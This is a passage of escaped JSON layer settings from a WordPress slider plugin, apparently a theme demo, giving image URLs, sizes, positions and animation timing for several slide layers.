To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":7550,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"4\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"13\":{\"text\":\"Image 13\",\"alias\":\"1l-new\",\"uid\":13,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-01-left_18_10_2018.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"844px\",\"e\":true},\"n\":{\"v\":\"844px\"},\"t\":{\"v\":\"844px\",\"e\":true},\"m\":{\"v\":\"844px\"}},\"height\":{\"d\":{\"v\":\"958px\",\"e\":true},\"n\":{\"v\":\"958px\"},\"t\":{\"v\":\"958px\",\"e\":true},\"m\":{\"v\":\"958px\"}},\"originalWidth\":844,\"originalHeight\":958,\"aspectRatio\":{\"d\":{\"v\":0.88100208768267},\"n\":{\"v\":0.88100208768267},\"t\":{\"v\":0.88100208768267},\"m\":{\"v\":0.88100208768267}}},\"position\":{\"x\":{\"d\":{\"v\":\"-165px\",\"e\":true},\"n\":{\"v\":\"-165px\"},\"t\":{\"v\":\"-165px\",\"e\":true},\"m\":{\"v\":\"-165px\"}},\"y\":{\"d\":{\"v\":\"-216px\",\"e\":true},\"n\":{\"v\":\"-216px\"},\"t\":{\"v\":\"-216px\",\"e\":true},\"m\":{\"v\":\"-216px\"}},\"horizontal\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\"}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"1\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"16\":{\"text\":\"Image 16\",\"alias\":\"1r-new\",\"uid\":16,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-01-right_18_10_2018.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1114px\",\"e\":true},\"n\":{\"v\":\"1114px\"},\"t\":{\"v\":\"1114px\"},\"m\":{\"v\":\"1114px\"}},\"height\":{\"d\":{\"v\":\"921px\",\"e\":true},\"n\":{\"v\":\"921px\"},\"t\":{\"v\":\"921px\"},\"m\":{\"v\":\"921px\"}},\"originalWidth\":1114,\"originalHeight\":921,\"aspectRatio\":{\"d\":{\"v\":1.2095548317047},\"n\":{\"v\":1.2095548317047},\"t\":{\"v\":1.2095548317047},\"m\":{\"v\":1.2095548317047}}},\"position\":{\"x\":{\"d\":{\"v\":\"-149px\",\"e\":true},\"n\":{\"v\":\"-149px\"},\"t\":{\"v\":\"-149px\"},\"m\":{\"v\":\"-149px\"}},\"y\":{\"d\":{\"v\":\"-154px\",\"e\":true},\"n\":{\"v\":\"-154px\"},\"t\":{\"v\":\"-154px\"},\"m\":{\"v\":\"-154px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"1\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"22\":{\"text\":\"Image 19\",\"alias\":\"Mob-img\",\"uid\":22,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-mob-slider_18_10_2018.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1024px\",\"e\":true},\"n\":{\"v\":\"1024px\"},\"t\":{\"v\":\"1024px\",\"e\":true},\"m\":{\"v\":\"1024px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"350px\",\"e\":true},\"n\":{\"v\":\"350px\"},\"t\":{\"v\":\"350px\",\"e\":true},\"m\":{\"v\":\"350px\",\"e\":true}},\"originalWidth\":1024,\"originalHeight\":350,\"aspectRatio\":{\"d\":{\"v\":2.9257142857143},\"n\":{\"v\":2.9257142857143},\"t\":{\"v\":2.9257142857143},\"m\":{\"v\":2.9257142857143}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-3px\",\"e\":true},\"n\":{\"v\":\"-3px\"},\"t\":{\"v\":\"-3px\",\"e\":true},\"m\":{\"v\":\"-3px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"d\":false,\"n\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Group11\",\"alias\":\"LOGO\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"900px\",\"e\":true},\"n\":{\"v\":\"900px\"},\"t\":{\"v\":\"900px\",\"e\":true},\"m\":{\"v\":\"900px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"700px\",\"e\":true},\"n\":{\"v\":\"700px\"},\"t\":{\"v\":\"700px\",\"e\":true},\"m\":{\"v\":\"700px\",\"e\":true}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-100px\",\"e\":true},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-140px\",\"e\":true},\"m\":{\"v\":\"-140px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"responsiveChilds\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":3000,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":3000,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 